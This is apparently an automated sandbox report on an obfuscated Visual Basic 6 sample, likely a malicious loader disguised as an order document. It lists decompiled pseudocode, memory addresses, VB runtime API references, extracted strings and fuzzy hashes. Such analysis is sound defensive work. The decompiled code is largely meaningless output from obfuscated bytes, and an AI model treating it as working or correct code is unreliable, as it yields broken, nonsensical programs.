								_t2106 =  *(_t2081 + 0x72) * 0x74;
								_t2155 = _t2106;
								if(_t2155 == 0) {
									goto L61;
								}
								if (_t2155 == 0) goto L42;
								L42:
								 *((intOrPtr*)(_t1932 + 0x6c)) =  *((intOrPtr*)(_t1932 + 0x6c)) + _t1360;
								asm("bound esi, [edx+0x65]");
								asm("arpl [eax+0x74], bp");
								L43:
								 *_t1360 =  *_t1360 + _t1360;
								L44:
								 *((intOrPtr*)(_t1360 + 0x65)) =  *((intOrPtr*)(_t1360 + 0x65)) + _t1932;
								asm("outsb");
								asm("arpl [edi+0x74], bp");
								 *[gs:ebx+0x6f] =  *[gs:ebx+0x6f] + _t1360;
							}
							_t56 =  &_a109;
							 *_t56 = _a109 + _t1360;
							_t2150 =  *_t56;
							asm("bound esi, [edx+0x79]");
							asm("outsd");
							if(_t2150 == 0) {
								L56:
								 *_t1360 =  *_t1360 ^ _t1360;
								_push(_t2098);
								L58:
								_t2106 = _t2106 - 0x18;
								_push(0x4013f6);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t2106;
								L004013F0();
								 *_t1930 =  *_t1930 - _t1930;
								asm("invalid");
								_push(_t1930);
								goto L60;
							}
							asm("outsd");
							if(_t2150 < 0) {
								if(_t2160 != 0) {
									goto L70;
								}
								asm("popad");
								if(_t2160 == 0) {
									goto L70;
								}
								asm("outsd");
								asm("outsb");
								goto L56;
							}
							 *[gs:eax] =  *[gs:eax] + _t1360;
							 *_t1360 =  *_t1360 + _t1360;
							_t2151 =  *_t1360;
							L32:
							_push(_t2106);
							if(_t2151 >= 0) {
								goto L58;
							}
							_push(0x65706f6c);
							L34:
							if(_t2151 < 0) {
								goto L58;
							}
							asm("popad");
							 *((intOrPtr*)(_t1930 + 0x6f)) =  *((intOrPtr*)(_t1930 + 0x6f)) + _t1932;
							L36:
							asm("outsd");
							asm("outsb");
							asm("outsd");
							asm("insd");
							_t2091 =  *(_t1930 + 0x74) * 0x6e697279;
							L37:
							_push(0x6e);
							_t2098 =  *(_t2091 + 0x67) * 0x656e7265;
							_t2154 = _t2098;
							goto L38;
						}
						if(_t2139 < 0) {
							goto L27;
						}
						asm("outsb");
						asm("a16 jb 0x4");
						 *_t1360 =  *_t1360 + _t1360;
						 *((intOrPtr*)(_t2081 + 0x45)) =  *((intOrPtr*)(_t2081 + 0x45)) + _t2081;
						L16:
						_push(_t2106);
						_t2081 = _t2081 + 1;
						_t2106 = _t2106 - 1;
						_t2098 =  &_a1;
						_push(_t2081);
						_t1932 = _t1932 + 1 - 1;
						_t2091 = _t2090 - 1;
						_t2085 = _t2085 + 1;
						_push(_t1930);
						 *_t1360 =  *_t1360 + _t1360;
						 *_t1360 =  *_t1360 + _t1360;
						if( *_t1360 < 0) {
							goto L32;
						}
						L17:
						asm("outsd");
						_push(0x65);
						_t2091 =  *(_t2098 + 0x61 + _t2098 * 2) * 0x67;
						if(_t2091 < 0) {
							goto L34;
						}
						 *[gs:eax] =  *[gs:eax] + _t1360;
						_t2143 =  *[gs:eax];
						if(_t2143 < 0) {
							goto L36;
						}
						asm("insb");
						asm("insb");
						if(_t2143 != 0) {
							goto L37;
						}
						if (_t2143 < 0) goto L21;
						 *_t1360 =  *_t1360 + _t1360;
						_t49 = _t2085 + 0x61;
						 *_t49 =  *((intOrPtr*)(_t2085 + 0x61)) + _t2081;
						asm("a16 outsd");
						asm("outsb");
						asm("insb");
						if( *_t49 >= 0) {
							goto L39;
						} else {
							 *_t1360 =  *_t1360 + _t1360;
							_a110 = _a110 + _t2081;
							 *_t1360 =  *_t1360 + _t1360;
							_t2085 = _t2085 - 1;
							_t2091 =  *(_t1932 + 0x7a + _t2098 * 2) * 0x6465 - 1;
							_t1930 = _t1930 + 1;
							_push(_t2106);
							_t2098 =  &_a1;
							_push(_t1930);
							 *_t1360 =  *_t1360 + _t1360;
							_t1932 = _t1932 - 0xfffffffffffffffe + 1;
							_t2145 = _t1932;
							asm("insb");
							asm("insb");
							asm("outsd");
							if(_t2145 < 0) {
								goto L42;
							}
							if(_t2145 == 0) {
								goto L43;
							}
							if (_t2145 >= 0) goto L25;
							 *_t1360 =  *_t1360 + _t1360;
							asm("popa");
							if( *_t1360 < 0) {
								goto L44;
							} else {
								_t1360 =  *_t1360 * 0x66450000;
								goto L27;
							}
						}
					}
				}
				_t2090 =  *(_t1930 + 0x6c) * 0x65;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				asm("bound esi, [edx+0x75]");
				if( *0x9c0040d4 == 0) {
					goto L11;
				}
				asm("insb");
				_t2090 =  *(_t1930 + 0x65) * 0x676e6972;
				asm("gs outsb");
				_t34 = _t1930 + 0x61;
				 *_t34 =  *((intOrPtr*)(_t1930 + 0x61)) + _t2081;
				asm("insd");
				asm("bound esp, [ecx+0x71]");
				if( *_t34 != 0) {
					goto L16;
				}
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				_t1932 = _t1932 + 1;
				asm("o16 jae 0x6f");
				asm("bound esp, [gs:ebp+0x74]");
				_t1360 = 0xffffffff9c0040d6 ^  *0x9c0040d4;
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				if( *0x9c0040d4 >= 0) {
					goto L17;
				}
				asm("outsb");
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				_t2127 =  *(_t1930 + 0x69) * 0x65726574;
				if (_t2127 >= 0) goto L9;
				_push(_t1930);
				asm("outsb");
				_t2090 =  *0xFFFFFFFF9C004144 * 0x737465;
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				 *((intOrPtr*)(_t1932 + 0x46)) =  *((intOrPtr*)(_t1932 + 0x46)) + _t1360;
				_t2085 = _t2085 + 1;
				_push(_t2081);
				_t2106 = _t2127 - 1;
				_push(_t1930);
				_push(_t1930);
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				_t42 = _t2090 + 0x4f;
				 *_t42 =  *((intOrPtr*)(_t2090 + 0x4f)) + _t1360;
				_t2138 =  *_t42;
				goto L10;
			}

0x0040f666
0x0040f667
0x0040f66a
0x0040f66b
0x0040f66d
0x0040f66d
0x0040f670
0x0040f674
0x0040f677
0x0040f67d
0x0040f682
0x0040f683
0x0040f686
0x0040f687
0x0040f689
0x0040f68c
0x0040f68d
0x0040f690
0x00000000
0x00000000
0x0040f692
0x0040f693
0x0040f695
0x0040f698
0x00000000
0x00000000
0x0040f69b
0x0040f69e
0x0040f6a1
0x0040f6a4
0x0040f6a7
0x0040f6ad
0x0040f6b5
0x0040f6b8
0x0040f6bc
0x0040f6c5
0x0040f6c8
0x0040f6ca
0x0040f6cb
0x0040f6d1
0x0040f6d7
0x0040f6df
0x0040f6e2
0x0040f6e3
0x0040f6e9
0x0040f6ec
0x0040f6ef
0x00000000
0x0040f6ef
0x0040f6f5
0x0040f6f8
0x0040f6fb
0x0040f701
0x0040f709
0x0040f70c
0x0040f710
0x0040f715
0x0040f718
0x0040f71e
0x0040f71f
0x0040f71f
0x0040f726
0x0040f78d
0x0040f78d
0x0040f78e
0x0040f78f
0x0040f790
0x0040f791
0x0040f792
0x0040f794
0x0040f796
0x0040f796
0x0040f798
0x0040f79a
0x0040f79a
0x0040f79c
0x0040f79d
0x0040f811
0x0040f811
0x00000000
0x0040f79f
0x0040f79f
0x0040f7a0
0x0040f7a2
0x0040f7a3
0x0040f812
0x0040f812
0x0040f814
0x0040f815
0x0040f81d
0x0040f81e
0x0040f81f
0x0040f856
0x0040f856
0x0040f858
0x0040f858
0x0040f8c8
0x0040f8c8
0x0040f8c9
0x0040f8ca
0x0040f8ca
0x0040f8cd
0x0040f8da
0x0040f8dd
0x0040f8e0
0x0040f8e2
0x0040f8e8
0x0040f8e9
0x0040f8eb
0x0040f8ed
0x0040f8ef
0x0040f8f1
0x0040f8f3
0x0040f8fd
0x0040f8fd
0x0040f8ff
0x0040f905
0x0040f905
0x0040f90c
0x0040f90c
0x0040f8f5
0x0040f8f7
0x0040f8fa
0x0040f8fb
0x00000000
0x0040f8fb
0x0040f85a
0x0040f85e
0x0040f85f
0x0040f85f
0x0040f863
0x00000000
0x00000000
0x0040f865
0x0040f867
0x0040f867
0x0040f86a
0x0040f86d
0x0040f870
0x0040f872
0x0040f873
0x0040f873
0x0040f876
0x0040f877
0x0040f87a
0x0040f87a
0x0040f823
0x0040f823
0x0040f823
0x0040f826
0x0040f829
0x0040f82a
0x0040f89e
0x0040f89e
0x0040f8a4
0x0040f8a7
0x0040f8a7
0x0040f8aa
0x0040f8b5
0x0040f8b6
0x0040f8c2
0x0040f8c3
0x0040f8c5
0x0040f8c7
0x00000000
0x0040f8c7
0x0040f82c
0x0040f82d
0x0040f897
0x00000000
0x00000000
0x0040f899
0x0040f89a
0x00000000
0x00000000
0x0040f89c
0x0040f89d
0x00000000
0x0040f89d
0x0040f82f
0x0040f832
0x0040f832
0x0040f834
0x0040f834
0x0040f835
0x00000000
0x00000000
0x0040f837
0x0040f83b
0x0040f83b
0x00000000
0x00000000
0x0040f83e
0x0040f83f
0x0040f841
0x0040f841
0x0040f842
0x0040f843
0x0040f844
0x0040f845
0x0040f84a
0x0040f851
0x0040f854
0x0040f854
0x00000000
0x0040f854
0x0040f7a5
0x00000000
0x00000000
0x0040f7a8
0x0040f7a9
0x0040f7ad
0x0040f7af
0x0040f7b1
0x0040f7b2
0x0040f7b4
0x0040f7b5
0x0040f7b6
0x0040f7b7
0x0040f7b8
0x0040f7b9
0x0040f7ba
0x0040f7bb
0x0040f7bc
0x0040f7be
0x0040f7c0
0x00000000
0x00000000
0x0040f7c2
0x0040f7c2
0x0040f7c3
0x0040f7c5
0x0040f7ca
0x00000000
0x00000000
0x0040f7cd
0x0040f7cd
0x0040f7d0
0x00000000
0x00000000
0x0040f7d2
0x0040f7d3
0x0040f7d4
0x00000000
0x00000000
0x0040f7d6
0x0040f7d9
0x0040f7db
0x0040f7db
0x0040f7de
0x0040f7e0
0x0040f7e1
0x0040f7e2
0x00000000
0x0040f7e5
0x0040f7e5
0x0040f7e7
0x0040f7f2
0x0040f7f5
0x0040f7f6
0x0040f7f8
0x0040f7fa
0x0040f7fc
0x0040f7fd
0x0040f7fe
0x0040f800
0x0040f800
0x0040f801
0x0040f802
0x0040f803
0x0040f804
0x00000000
0x00000000
0x0040f806
0x00000000
0x00000000
0x0040f808
0x0040f80a
0x0040f80c
0x0040f80e
0x00000000
0x0040f810
0x0040f810
0x00000000
0x0040f810
0x0040f80e
0x0040f7e2
0x0040f79d
0x0040f728
0x0040f72c
0x0040f72e
0x0040f730
0x0040f733
0x00000000
0x00000000
0x0040f735
0x0040f736
0x0040f73d
0x0040f73f
0x0040f73f
0x0040f742
0x0040f743
0x0040f746
0x00000000
0x00000000
0x0040f748
0x0040f74a
0x0040f74c
0x0040f74d
0x0040f750
0x0040f754
0x0040f756
0x0040f758
0x00000000
0x00000000
0x0040f761
0x0040f762
0x0040f769
0x0040f770
0x0040f774
0x0040f775
0x0040f776
0x0040f77d
0x0040f77f
0x0040f782
0x0040f783
0x0040f785
0x0040f786
0x0040f788
0x0040f789
0x0040f78b
0x0040f78b
0x0040f78b
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DA30,00416364,?,?,?,?,004013F6), ref: 0040F919
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040F97E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040F9E0
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040FA08
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FA27
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA63
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001D0), ref: 0040FAB0

Strings

Tudemikkel, xrefs: 00410A4C
ANTNDELSEN, xrefs: 004108A9
dcA, xrefs: 0040FCE3
ALUMIUM, xrefs: 004105E9
5D, xrefs: 00411B8C
1N, xrefs: 00411110, 00411116
), xrefs: 004125AE
Haandbremser6, xrefs: 004112D1
chaccon, xrefs: 00411787
aQ, xrefs: 00411598
Zubeneschamali, xrefs: 004105E4
AFDELINGSCHEFERS, xrefs: 00410CD4
dcA, xrefs: 0040F907
Audiometry, xrefs: 00411782
dcA, xrefs: 0040FDF1
@B0%, xrefs: 0041102A
dcA, xrefs: 0040F934

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free
String ID: )$5D$@B0%$AFDELINGSCHEFERS$ALUMIUM$ANTNDELSEN$Audiometry$Haandbremser6$Tudemikkel$Zubeneschamali$aQ$chaccon$dcA$dcA$dcA$dcA$1N
API String ID: 4269135739-1794618918
Opcode ID: 31dd3b43d295646846f60cad14cbe20ced5d7ba8a6890d60d2cb563e936d86ac
Instruction ID: 92c42b2245208dc41c3fc880fbe25f0a7b5ea5ceeeb71dac2977407e590978ed
Opcode Fuzzy Hash: 31dd3b43d295646846f60cad14cbe20ced5d7ba8a6890d60d2cb563e936d86ac
Instruction Fuzzy Hash: AB431D75940219AFCB21EF50CD49BD9BBB4BB08304F1041EAE10ABB1A1DB799EC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8A4, Relevance: 394.5, APIs: 208, Strings: 16, Instructions: 2541
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040F8A4(signed int _a4, intOrPtr _a23, void* _a758) {
				void* _v3;
				intOrPtr _v8;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				void* _v52;
				void* _v324;
				void* _v332;
				void* _v344;
				void* _v348;
				void* _v356;
				void* _v360;
				void* _v384;
				void* _v388;
				void* _v392;
				void* _v396;
				void* _v432;
				void* _v436;
				void* _v444;
				void* _v448;
				void* _v452;
				void* _v472;
				void* _v476;
				void* _v480;
				void* _v492;
				void* _v500;
				void* _v504;
				void* _v508;
				void* _v516;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				void* _v540;
				void* _v548;
				void* _v556;
				void* _v564;
				void* _v572;
				void* _v580;
				void* _v588;
				void* _v596;
				void* _v604;
				void* _v612;
				void* _v620;
				void* _v628;
				void* _v636;
				void* _v644;
				void* _v664;
				void* _v668;
				void* _v672;
				void* _v676;
				void* _v680;
				void* _v684;
				void* _v688;
				void* _v692;
				void* _v696;
				void* _v700;
				void* _v712;
				void* _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v756;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v904;
				void* _v908;
				void* _v912;
				void* _v936;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* _v968;
				void* _v972;
				void* _v976;
				void* _v980;
				void* _v984;
				void* _v988;
				void* _v992;
				void* _v996;
				void* _v1000;
				void* _v1004;
				void* _v1008;
				void* _v1012;
				void* _v1016;
				void* _v1020;
				void* _v1024;
				void* _v1028;
				void* _v1032;
				void* _v1036;
				void* _v1040;
				void* _v1044;
				void* _v1048;
				void* _v1052;
				void* _v1056;
				void* _v1060;
				void* _v1064;
				void* _v1068;
				void* _v1072;
				void* _v1076;
				void* _v1080;
				void* _v1084;
				void* _v1088;
				void* _v1092;
				void* _v1096;
				void* _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1116;
				void* _v1120;
				void* _v1124;
				void* _v1128;
				void* _v1132;
				void* _v1136;
				void* _v1140;
				void* _v1144;
				void* _v1148;
				void* _v1152;
				void* _v1156;
				void* _v1160;
				void* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1176;
				void* _v1180;
				void* _v1184;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				void* _v1212;
				void* _v1216;
				void* _v1220;
				void* _v1224;
				void* _v1228;
				void* _v1232;
				void* _v1236;
				void* _v1240;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1260;
				void* _v1264;
				void* _v1268;
				void* _v1272;
				void* _v1276;
				void* _v1280;
				void* _v1284;
				void* _v1288;
				void* _v1292;
				void* _v1296;
				void* _v1300;
				void* _v1304;
				void* _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				void* _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				void* _v1340;
				void* _v1344;
				void* _v1348;
				void* _v1352;
				signed int _t1284;
				signed int _t1285;
				signed int _t1286;
				void* _t1841;
				intOrPtr* _t1842;
				void* _t1843;
				signed char _t1844;
				void* _t1988;
				void* _t2002;
				intOrPtr _t2003;

				_t2003 = _t2002 - 0x18;
				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t2003;
				L004013F0();
				 *_t1842 =  *_t1842 - _t1842;
				asm("invalid");
				_push(_t1842);
				_v28 = _t2003;
				_v24 = 0x401110;
				_v20 = _a4 & 0x00000001;
				_t1284 = _a4;
				_t1285 = _t1284 & 0xfffffffe;
				 *((char*)(_t1844 + 0x45c70845)) =  *((char*)(_t1844 + 0x45c70845)) - 1;
				asm("hlt");
				 *_t1285 =  *_t1285 + _t1285;
				 *_t1285 =  *_t1285 + _t1285;
				_t1286 = _a4;
				 *(_t1842 + 0x875ff00) =  *(_t1842 + 0x875ff00) | _t1844;
				_t1843 = _t1842 + _t1842;
				if(_t1843 == 0) {
					_t1841 =  *((intOrPtr*)(_t1286 + 4))();
					_t1286 = _t1841 + 0xc7;
					asm("cld");
					 *_t1286 =  *_t1286 + _t1286;
				}
				 *_t1286 =  *_t1286 + _t1286;
				_v8 = 2;
				 *((intOrPtr*)(_t1843 + 0x4163643d)) =  *((intOrPtr*)(_t1843 + 0x4163643d)) + _t1286;
				_a23 = _a23 + _t1988;
			}

0x0040f8a7
0x0040f8aa
0x0040f8b5
0x0040f8b6
0x0040f8c2
0x0040f8c3
0x0040f8c5
0x0040f8c7
0x0040f8ca
0x0040f8cd
0x0040f8da
0x0040f8dd
0x0040f8e0
0x0040f8e2
0x0040f8e8
0x0040f8e9
0x0040f8eb
0x0040f8ed
0x0040f8ef
0x0040f8f1
0x0040f8f3
0x0040f8f5
0x0040f8f7
0x0040f8fa
0x0040f8fb
0x0040f8fb
0x0040f8fd
0x0040f8ff
0x0040f905
0x0040f90c

APIs

__vbaChkstk.MSVBVM60(?,004013F6), ref: 0040F8C2
__vbaNew2.MSVBVM60(0040DA30,00416364,?,?,?,?,004013F6), ref: 0040F919
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040F97E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040F9E0
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040FA08
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FA27
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA63
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001D0), ref: 0040FAB0
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FAD7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB13
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB5D
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB71
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB85
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000204,?,?,00000000), ref: 0040FBF4
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0040FC18
__vbaRecUniToAnsi.MSVBVM60(0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC3C
__vbaStrToAnsi.MSVBVM60(?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC4E
__vbaSetSystemError.MSVBVM60(00000000,?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC5F
__vbaRecAnsiToUni.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC77
__vbaFreeStr.MSVBVM60 ref: 0040FC9A
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 0040FCC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040FD2D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 0040FD8F
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 0040FDB7
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 0040FDD6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040FE3B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 0040FE9D
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 0040FEC5
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FEE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA68,00000160), ref: 0040FF6D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D230,0000015C), ref: 0040FFB9
__vbaFreeObj.MSVBVM60(00000000,?,0040D230,0000015C), ref: 0040FFD3
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FFF2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041002E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000160), ref: 0041007B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004100A0
__vbaI4Var.MSVBVM60(?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100B3
__vbaSetSystemError.MSVBVM60(00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100C4
__vbaNew2.MSVBVM60(0040DE54,00416010,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100DC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410118
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA88,000000F0), ref: 00410165
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004101AA
__vbaFreeVar.MSVBVM60(?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101B8
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101D1
__vbaOnError.MSVBVM60(000000FF,000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101DF
#568.MSVBVM60(000000C4,000000FF,000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101F7
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 0041021C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410258
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA98,00000150), ref: 004102A5
__vbaSetSystemError.MSVBVM60(?), ref: 004102CA
__vbaFreeObj.MSVBVM60(?), ref: 004102ED
#611.MSVBVM60(?), ref: 00410308
__vbaStrMove.MSVBVM60(?), ref: 00410315
#554.MSVBVM60(?), ref: 00410321
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00410340
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041037C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAA8,00000190), ref: 004103C9
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004103EE
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004103F7
__vbaStrMove.MSVBVM60(00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 00410404
#531.MSVBVM60(00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 0041040A
__vbaFreeStr.MSVBVM60(00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 00410415
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?), ref: 0041042A
__vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 00410438
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00410457
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?), ref: 00410493
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAB8,00000088,?,?,?,?), ref: 004104E0
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?), ref: 00410507
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?), ref: 00410543
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000160,?,?,?,?,?,?), ref: 00410590
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?), ref: 004105B5
__vbaI4Var.MSVBVM60(?,ALUMIUM,Zubeneschamali,?), ref: 004105F5
__vbaHresultCheckObj.MSVBVM60(?,?,0040D260,00000704,?,00000000,?,ALUMIUM,Zubeneschamali,?), ref: 00410641
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041066C
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 0041067A
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,00000000,?,?,0040D540,?), ref: 00410699
__vbaObjSet.MSVBVM60(?,00000000), ref: 004106D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000190), ref: 00410722
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,00000700,?,?,?,?,?), ref: 004107AA
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004107DC
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 004107FB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00410837
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000048,?,?,?,?,?), ref: 0041087E
__vbaFreeStr.MSVBVM60(?,?,?,?,?), ref: 004108C2
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004108CD
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 004108EC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00410928
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000160,?,?,?,?,?), ref: 00410975
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 0041099C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 004109D8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040D96C,00000188,?,?,?,?,?,?,?), ref: 00410A25
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,0000070C,?,00002F77,00753E95,004BC285,?,Tudemikkel,?,?,?,?,?,?), ref: 00410AAA
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00002F77,00753E95,004BC285,?,Tudemikkel,?,?,?,?,?,?,?), ref: 00410ACE
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00410AF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410B2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA68,00000058), ref: 00410B73
__vbaFreeObj.MSVBVM60 ref: 00410BD1
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00410BF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410C2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,00000048), ref: 00410C73
__vbaStrMove.MSVBVM60(00000000,?,0040D96C,00000048), ref: 00410CB0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,000006F8,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D1B
__vbaFreeStr.MSVBVM60(?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D4D
__vbaFreeObj.MSVBVM60(?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D58
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D77
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410DB3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB64,00000078,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410DFA
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410E21
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410E5D
